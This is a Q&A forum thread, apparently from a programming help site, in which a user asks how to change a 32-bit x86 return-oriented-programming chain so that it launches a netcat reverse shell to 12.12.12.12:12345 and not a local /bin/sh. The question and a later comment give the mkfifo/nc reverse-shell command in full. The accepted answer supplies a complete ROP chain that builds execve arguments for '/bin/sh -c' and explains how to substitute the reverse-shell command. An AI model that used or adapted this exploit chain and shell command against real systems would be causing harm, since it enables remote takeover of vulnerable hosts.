# Modifying a ROP gadget

Tags: assembly, network-security, stack-smash

I have a ROP gadget which looks like this-

```
p = ""
p += pack('<I', 0x08139e7a) # pop edx ; ret
p += pack('<I', 0x081e0060) # @ .data
p += pack('<I', 0x080f3246) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x080d5fc8) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x08139e7a) # pop edx ; ret
p += pack('<I', 0x081e0064) # @ .data + 4
p += pack('<I', 0x080f3246) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x080d5fc8) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x08139e7a) # pop edx ; ret
p += pack('<I', 0x081e0068) # @ .data + 8
p += pack('<I', 0x08061150) # xor eax, eax ; ret
p += pack('<I', 0x080d5fc8) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481f1) # pop ebx ; ret
p += pack('<I', 0x081e0060) # @ .data
p += pack('<I', 0x0819d91d) # pop ecx ; ret
p += pack('<I', 0x081e0068) # @ .data + 8
p += pack('<I', 0x08139e7a) # pop edx ; ret
p += pack('<I', 0x081e0068) # @ .data + 8
p += pack('<I', 0x08061150) # xor eax, eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x0805726e) # int 0x80
```

As you must have guessed it just spawns a "/bin//sh". I want it to spawn a remote shell whose command is:

```
rm -f /tmp/$$; mkfifo /tmp/$$ ; cat /tmp/$$ | /bin/sh -i 2>&1 | nc  12.12.12.12 12345 > /tmp/$$
```

Can anyone help me in creating a gadget to execute the remote shell. I tried looking at this [link](http://shell-storm.org/blog/Return-Oriented-Programming-and-ROPgadget-tool/), but couldn't understand much.

Answer (score 2, accepted):

The problem is that your sample code launches `/bin/sh`, which is a single command, and without arguments too. What you want to do is a piped sequence of commands. You can execute that if you launch a shell with the whole command passed as an argument to `-c`. Thus what you really need is `/bin/sh -c 'rm -f /tmp/$$; mkfifo /tmp/$$ ; cat /tmp/$$ | /bin/sh -i 2>&1 | nc  12.12.12.12 12345 > /tmp/$$'`. This requires significant modification to your sequence, since you have to build an argument array.

To keep the code short, let's do an example for `/bin/sh -c "echo OK"`.
The `execve` system calls expects an array of pointers terminated by `NULL` to specify the arguments. In the original version, this is just a `NULL` stored at `.data + 8`, and this address is loaded into `ecx` for the system call. The data layout is as follows:

```
+0: '/bin'
+4: '//sh'
+8: NULL
```

Now, we will need to add to that:

```
+12: argv[0] = "/bin//sh"
+16: argv[1] = "-c"
+20: argv[2] = "echo OK"
+24: argv[3] = NULL
+28: "-c"
+32: 'echo'
+36: " OK"
```

Remember that `argv[0]` is used for the program name by convention. Also, we will need to pass `.data+12` in `ecx` for the system call.

The whole thing may look like:

```
p = ""
p += pack('<I', 0x08139e7a) # pop edx ; ret
p += pack('<I', 0x081e0060) # @ .data
p += pack('<I', 0x080f3246) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x080d5fc8) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x08139e7a) # pop edx ; ret
p += pack('<I', 0x081e0064) # @ .data + 4
p += pack('<I', 0x080f3246) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x080d5fc8) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x08139e7a) # pop edx ; ret
p += pack('<I', 0x081e0068) # @ .data + 8
p += pack('<I', 0x08061150) # xor eax, eax ; ret
p += pack('<I', 0x080d5fc8) # mov dword ptr [edx], eax ; ret

# "-cXX" @ .data+28, the XX will be zeroed later
p += pack('<I', 0x08139e7a) # pop edx ; ret
p += pack('<I', 0x081e007c) # @ .data + 28
p += pack('<I', 0x080f3246) # pop eax ; ret
p += '-cXX'
p += pack('<I', 0x080d5fc8) # mov dword ptr [edx], eax ; ret
# zero the XX now
p += pack('<I', 0x08139e7a) # pop edx ; ret
p += pack('<I', 0x081e007e) # @ .data + 30
p += pack('<I', 0x08061150) # xor eax, eax ; ret
p += pack('<I', 0x080d5fc8) # mov dword ptr [edx], eax ; ret

# build command line @.data+32
# let's do "echo OK" as an example
p += pack('<I', 0x08139e7a) # pop edx ; ret
p += pack('<I', 0x081e0080) # @ .data + 32
p += pack('<I', 0x080f3246) # pop eax ; ret
p += 'echo'
p += pack('<I', 0x080d5fc8) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x08139e7a) # pop edx ; ret
p += pack('<I', 0x081e0084) # @ .data + 36
p += pack('<I', 0x080f3246) # pop eax ; ret
p += ' OK.'
p += pack('<I', 0x080d5fc8) # mov dword ptr [edx], eax ; ret
# zero terminator
p += pack('<I', 0x08139e7a) # pop edx ; ret
p += pack('<I', 0x081e0087) # @ .data + 39
p += pack('<I', 0x08061150) # xor eax, eax ; ret
p += pack('<I', 0x080d5fc8) # mov dword ptr [edx], eax ; ret

# build the argument array @.data+12
# pointer to "//bin/sh" (program name)
p += pack('<I', 0x08139e7a) # pop edx ; ret
p += pack('<I', 0x081e006c) # @ .data + 12
p += pack('<I', 0x080f3246) # pop eax ; ret
p += pack('<I', 0x081e0060) # @ .data
p += pack('<I', 0x080d5fc8) # mov dword ptr [edx], eax ; ret

# pointer to "-c"
p += pack('<I', 0x08139e7a) # pop edx ; ret
p += pack('<I', 0x081e0070) # @ .data + 16
p += pack('<I', 0x080f3246) # pop eax ; ret
p += pack('<I', 0x081e007c) # @ .data + 28
p += pack('<I', 0x080d5fc8) # mov dword ptr [edx], eax ; ret

# pointer to command
p += pack('<I', 0x08139e7a) # pop edx ; ret
p += pack('<I', 0x081e0074) # @ .data + 20
p += pack('<I', 0x080f3246) # pop eax ; ret
p += pack('<I', 0x081e0080) # @ .data + 32
p += pack('<I', 0x080d5fc8) # mov dword ptr [edx], eax ; ret

# NULL
p += pack('<I', 0x08139e7a) # pop edx ; ret
p += pack('<I', 0x081e0078) # @ .data + 24
p += pack('<I', 0x08061150) # xor eax, eax ; ret
p += pack('<I', 0x080d5fc8) # mov dword ptr [edx], eax ; ret

p += pack('<I', 0x080481f1) # pop ebx ; ret
p += pack('<I', 0x081e0060) # @ .data
p += pack('<I', 0x0819d91d) # pop ecx ; ret
p += pack('<I', 0x081e006c) # @ .data + 12 (argument array)
p += pack('<I', 0x08139e7a) # pop edx ; ret
p += pack('<I', 0x081e0068) # @ .data + 8
p += pack('<I', 0x08061150) # xor eax, eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x0805726e) # int 0x80
```

To build your command you just have to split the command into chunks of 4 bytes and repeat the appropriate ROP block as many times as needed. Remember to zero terminate in the end. HTH.

Comment: Thanks for the answer, I understood the technique, but is there an automated way to generate this gadget or do I need to make the changes manually to get
/bin/sh -c rm -f /tmp/$$; mkfifo /tmp/$$ ; cat /tmp/$$ | /bin/sh -i 2>&1 | nc localhost 12345

Comment: Of course you can automate it, if you are good in python scripting :)